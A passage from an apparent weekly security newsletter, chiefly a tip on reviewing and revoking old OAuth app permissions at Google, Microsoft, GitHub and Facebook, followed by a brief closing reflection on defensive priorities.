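Reporting the line number rather than the matched text keeps the password itself out of the scan output, which otherwise becomes one more place the secret lives.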
🔒 Tip of the Week
Check and Revoke Permissions for Old OAuth Apps: They Are Silent Backdoors → You have probably logged in to an app using "Continue with Google," "Sign in with Microsoft," or a GitHub, Twitter, or Facebook login. That is OAuth. But did you know that many of these apps can still access your data long after you have stopped using them?
Why it matters:
An app may keep ongoing access to your calendar, email, cloud files, or contact list even if you deleted it or forgot it existed. No password is required. If that third party is compromised, your data is at risk.
What to do:
- Review your connected apps here:
- Google: myaccount.google.com/permissions
- Microsoft: account.live.com/consent/manage
- GitHub: github.com/settings/applications
- Facebook: facebook.com/settings?tab=applications
Revoke anything you are not actively using. It is a quick and quiet cleanup that closes a door you did not know was open.
Conclusion
Looking ahead, the job is not just tracking threats but understanding what they reveal. Every tactic and every probed system points to deeper questions about how trust, access, and visibility are managed. As attackers adapt quickly, defenders need sharper recognition and faster response loops.
This week's takeaways are not only technical. They speak to how teams prioritize risk, design safeguards, and make choices under pressure. Use these insights not just to respond, but to rethink what "secure" really needs to mean in today's environment.